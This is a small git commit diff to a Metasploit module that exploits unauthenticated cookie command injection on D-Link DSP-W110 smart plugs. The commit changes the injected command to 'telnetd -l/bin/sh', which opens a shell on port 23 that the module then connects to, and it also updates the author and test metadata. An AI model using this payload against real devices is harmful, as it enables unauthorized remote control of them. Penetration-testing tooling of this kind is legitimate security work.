port, email, cleanup

Michael Messner · Michael Messner · commit 145637470a6d · 2015-06-14T08:27:23.000+02:00
diff --git a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
@@ -18,11 +18,12 @@ def initialize(info = {})
         This module exploits an anonymous remote code execution vulnerability on different D-Link
         devices. The vulnerability is a command injection in the cookie handling process of the
         lighttpd web server when handling specially crafted cookie values. This module has been
-        successfully tested on D-Link DSP-W110A1_FW105B01 in an emulated environment.
+        successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment and on the real
+        device.
       },
       'Author'         =>
         [
-          'Peter Adkins',   # vulnerability discovery and initial PoC
+          'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # vulnerability discovery and initial PoC
           'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
         ],
       'License'        => MSF_LICENSE,
@@ -67,12 +68,9 @@ def exploit
 
     print_status("#{peer} - Exploiting...")
 
-    telnetport = rand(32767) + 32768
-
-    cmd = "telnetd -p #{telnetport}"
-
+    cmd = "telnetd -l/bin/sh"
     execute_command(cmd)
-
+    telnetport = 23
     handle_telnet(telnetport)
   end
 
